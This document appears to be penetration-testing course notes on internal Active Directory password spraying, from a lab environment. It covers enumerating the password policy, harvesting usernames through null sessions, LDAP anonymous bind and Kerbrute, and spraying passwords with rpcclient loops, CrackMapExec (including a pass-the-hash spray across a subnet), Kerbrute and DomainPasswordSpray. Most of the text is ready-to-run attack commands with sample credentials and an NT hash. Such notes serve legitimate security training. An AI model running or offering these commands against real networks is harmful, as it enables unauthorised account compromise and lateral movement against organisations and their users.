Password Spraying - Internal

Password Policy Enumeration

Unauthenticated Password Policy Enumeration

The password policy can be enumerated in many ways unauthenticated or not to the domain controller. For example, Enum4Linux is tool that can be used to enumerate the password policy. This tools works over many others tools such as rpclient and smbclient, as well as nbstat and net.

Factors to consider:

• Maximum number of attempts before locking an account

• Account unlock automatically (or not)

• Password complexity (Password complexity set to 1 means password complexity is enabled)

• Minimum password length

Enum4Linux-ng is an updated version of the traditional enum4linux and allows for .json and .YAML output. A null session can also be started from a Windows machine from a command line interface. It is also possible to enumerate the password policy by leveraging LDAP anonymous bind.

rpclient

rpcclient -U "" -N 172.16.5.5

rpclient>querydominfo

CrackMapExec

In case SMB Null sessions are permitted

crackmapexec smb 172.16.5.5 -u '' -p '' --pass-pol

CMD Line

C:\htb > net use \\DC01\ipc$ "" /u:guest

Enum4Linux-ng

enum4linux-ng -P 172.16.5.5 -oA ilfreight

ldapSearch

ldapsearch -h 172.16.5.5 -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength

Authenticated Password Policy Enumeration

If we can authenticate to the domain controller, the password policy can be enumerated from a Windows machine as so:

CMD Line

C:\htb> net accounts

Making a list of usernames

Different techniques can be used to build a list of valid or potential usernames. For example, in an internal engagement, we can leverage SMB Null session or LDAP Anonymous bind agains the domain controller to extract the full list of usernames of the domain.

We can also build a list of usernames based on previous OSINT or on a database containing statistically likely usernames. The tool linkedin2username can be used to build a list of format usernames based on our LinkedIn searchs.

GitHub - initstring/linkedin2username: OSINT Tool: Generate username lists for companies on LinkedInGitHub

linkedin2username

Unauthenticated

These commands and tools can be used to enumerate domain users if we are on the network but with no domain users credentials.

rpclient

If SMB Null Session is permitted

rpcclient -U "" -N <DC_IP>

enumdomusers

Enum4Linux

If SMB Null session is permitted

enum4linux -U <DC_IP>  | grep "user:" | cut -f2 -d"[" | cut -f1 -d"]"

CrackMapExec

If SMB Null session is permitted. CrackMapExec also indicates the number of bad attempts (badpwdcount) and the time since the last bad password attempt (baddpwdtime).

crackmapexec smb <DC_IP> --users

ldapsearch

If LDAP anonymous bind is permitted

ldapsearch -H <DC_IP> -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "(&(objectclass=user))"  | grep sAMAccountName: | cut -f2 -d" "

Windapsearch

Works over LDAP. Windapsearch.

./windapsearch.py --dc-ip 172.16.5.5 -u "" -U

Kerbrute

Kerbrute can be used to identify valid users accounts in case we do not have any domain users, SMB Null session is disabled and we do not have any foothold on the internal network. However, the DC should be reachable for the attacker. This tools will identify valid domain usernames by sending a TGT request to the domain controller without Pre-Authentication for each specific usernames in our list. Kerbrute responding with PRINCIPAL UNKNOWN means that the username does not exist. This method of user enumeration does not trigger any failed logon attempts.

kerbrute userenum -d inlanefreight.local --dc 172.16.5.5 /opt/jsmith.txt 

Will trigger event ID 4768: A Kerberos authentication ticket (TGT) was requested

Authenticated

If we have credentials for a user domain accounts, listing all valid usernames is simple. We can use CrackMapExec to do so.

sudo crackmapexec smb 172.16.5.5 -u htb-student -p Academy_student_AD! --users

Conducting Password Spraying attack

From a Linux Attack Box

A password spray attack can be performed in many ways from a Linux computer. Since many tools can be used, CrackMapExec is especially a powerful one.

rpclient

for u in $(cat valid_users.txt);do rpcclient -U "$u%Welcome1" -c "getusername;quit" 172.16.5.5 | grep Authority; done

CrackMapExec

sudo crackmapexec smb 172.16.5.5 -u valid_users.txt -p Password123 | grep +

Add the flag --continue-on-success to list all valid pairs of credentials

Kerbrute

kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 valid_users.txt  Welcome1

Local Administration Account

CrackMapExec can also be used to password spray against local administration account. It is recommended to check for any password reused. Local administrators may have the same password set for all host in a domain. It is also common that an administrative account shares the same password with a low privilege account.

Using CME, it is possible to perform password spraying, both using the NT Hash of a user or the clear text password. The --local-auth flag is important to spray local account and not domain account.

sudo crackmapexec smb --local-auth 172.16.5.0/23 -u administrator -H 88ad09182de639ccc6579eb0849751cf | grep +

From a Windows Attack Box

The tool DomainPasswordSpray by dafthack can be useful to perform a password spray attack from a Windows Attack box. This tools is a script written in Powershell.

What is quite handy is that this tool will automatically generate a usernames list if we are from a domain-joined host. From an unauthenticated domain perspective, we can specify to the tool a usernames list. The tool automatically limits the number of authentication attempts by windows to prevent lockout.

PS C:\htb> Import-Module .\DomainPasswordSpray.ps1
PS C:\htb> Invoke-DomainPasswordSpray -Password Welcome1 -OutFile spray_success -ErrorAction SilentlyContinue

An alternative to this tool is Kerbrute, which can be run from both Windows and Linux.